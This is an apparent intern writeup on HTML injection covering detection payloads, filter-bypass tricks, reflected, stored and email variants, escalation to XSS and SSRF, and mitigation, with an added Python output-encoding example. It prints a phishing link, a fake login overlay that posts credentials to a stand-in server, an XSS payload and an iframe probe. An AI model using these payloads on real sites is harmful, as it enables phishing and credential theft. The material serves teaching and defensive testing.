Research on HTML Injection
Hello guys, Prajit here from the BUG XS Team, and a Cybersecurity and Red Team Intern at Cyber Sapiens United LLP. In this internship I am regularly given interesting tasks; for my ninth task I was asked to research the HTML Injection vulnerability and write a report about it.
What is HTML Injection?
HTML Injection, also termed "virtual defacement", is one of the simplest and most common vulnerabilities. It arises when a web page fails to sanitize user-supplied input or to validate its output, which allows an attacker to craft payloads and inject malicious HTML into the application through the vulnerable fields, so that he can modify the page content and even capture some sensitive data.
When an application does not properly handle user-supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as it exploits both a code-based vulnerability and a user's trust.
The latest HTML version is HTML 5.
How to Detect HTML Injection?
You can detect HTML injection by first finding parameters and endpoints that take user input and reflect it back on the client side. Note that the injection point can be in one place while the reflection appears somewhere else, so remember to look thoroughly.
The following payloads can be used to find it:
1. <h1>SAPT</h1> and <h6>SAPT</h6>, then compare how the two render
2. <img src=img_url> Check if the given image is injected
3. <a href=https://evil.com>ClickHere</a> Check if the link is injected.
When trying this you may well be blocked, or filtering techniques may be in place. So should you give up? No, we also have some methods to bypass these features.
1. My favourite technique for manual hunting of this is "Query Balancing"; it is applicable to XSS too, not only HTML Injection.
For your input (idnf), suppose the HTML source is as follows:
<input type="text" value="idnf">
In such cases, to escape the value attribute you have to start your payload with ">
What happens? The "> closes the input tag before our payload, so our input is no longer stored in the "value" attribute and the remainder is left as an open string. If the web application firewall is checking only the content of the value attribute, there is nothing suspicious and the request passes, but the rest of the payload stays in the page, is treated as part of the markup and is rendered. Hence bypassed.
2. You can also use encodings on your payload and inject them to bypass it, like base64 encoding or URL encoding. It sometimes bypasses the filters.
What are the Different Types of HTML Injection?
1. Reflected HTML Injection
When you inject an HTML payload and it is shown only at that moment; as soon as the page reloads, the injection goes away. It generally occurs on GET parameters and sometimes on POST parameters too.
2. Stored HTML Injection
When you inject an HTML payload and it stays there until it is changed, even if you log out of your account and come back; hence it is stored.
3. Email HTML Injection
When the content of emails arriving in your mailbox is injected with HTML payloads, it is known as Email HTML Injection. This is P4 according to the Bugcrowd VRT.
What are the Exploit Scenarios / Escalation For HTML Injection?
1. The most basic exploit is to use HTML injection as a medium for social engineering. It can be done by injecting a link:
<a href=https://evil.com>ClickHere for Rewards</a>
Or by injecting a complete form:
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid
credentials:<br><form name="login" action="http://YOURSERVER/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>
2. It can also be escalated to XSS with the help of HTML Injection, which is pretty common. E.g. the payload <IMG SRC=JaVaScRiPt:alert('XSS')> can be used for this.
3. HTML Injection to SSRF via <iframe> tags. E.g. the payload <iframe src="http://BURP-COLLABORATOR-URL"></iframe> can be used.
Since it is SSRF, it can sometimes also be used to read server files like /etc/passwd, drastically changing the severity.
How to Mitigate HTML Injection Vulnerability?
The best way to mitigate this is to properly filter user input and to block HTML metacharacters so that they cannot be interpreted as markup.
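As an added illustration of that mitigation (not code from the original writeup), the snippet below models the reflected <input type="text" value="idnf"> case from the Query Balancing section with a hypothetical template: the vulnerable rendering beside the hardened one that HTML-encodes the value, plus a parser-based check showing whether the "> attribute escape produced an extra element. The render functions, the probe value and the template are all constructed assumptions.

```python
import html
from html.parser import HTMLParser

# Hypothetical reflection point, modelled on the <input type="text" value="idnf">
# example above (assumed template, not taken from a real application).
def render_unsafe(user_value: str) -> str:
    # Vulnerable: the raw value is concatenated into the attribute, so a
    # leading "> closes the attribute and the tag (the "query balancing" trick).
    return f'<input type="text" value="{user_value}">'

def render_safe(user_value: str) -> str:
    # Hardened: encode <, >, &, " and ' before embedding. This encoding is
    # correct for text and double-quoted attribute contexts only; unquoted
    # attributes, URLs and script blocks need context-specific encoders.
    return f'<input type="text" value="{html.escape(user_value, quote=True)}">'

class _TagCollector(HTMLParser):
    """Records every start tag and its (unescaped) attributes in a fragment."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {k: (v or "") for k, v in attrs}))

def parse_tags(markup: str) -> list[tuple[str, dict[str, str]]]:
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags

def injection_succeeded(markup: str) -> bool:
    # The template contains exactly one element; any additional start tag
    # means user data was interpreted as markup rather than as a value.
    return len(parse_tags(markup)) > 1

if __name__ == "__main__":
    # Constructed probe: the page's first detection payload, prefixed with
    # the "> attribute escape described above.
    probe = '"><h1>SAPT</h1>'
    print(render_unsafe(probe), injection_succeeded(render_unsafe(probe)))
    print(render_safe(probe), injection_succeeded(render_safe(probe)))
```

With the hardened version the browser still receives the full probe string, but only as the attribute's text value, which is what the parser check confirms.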
This is all for today's writeup.
Thanks For Reading
Profile Links:
Twitter: https://twitter.com/SAPT01
LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/
Instagram: https://instagram.com/prajit_01?utm_medium=copy_link
BUG XS Official Website: https://www.bugxs.co/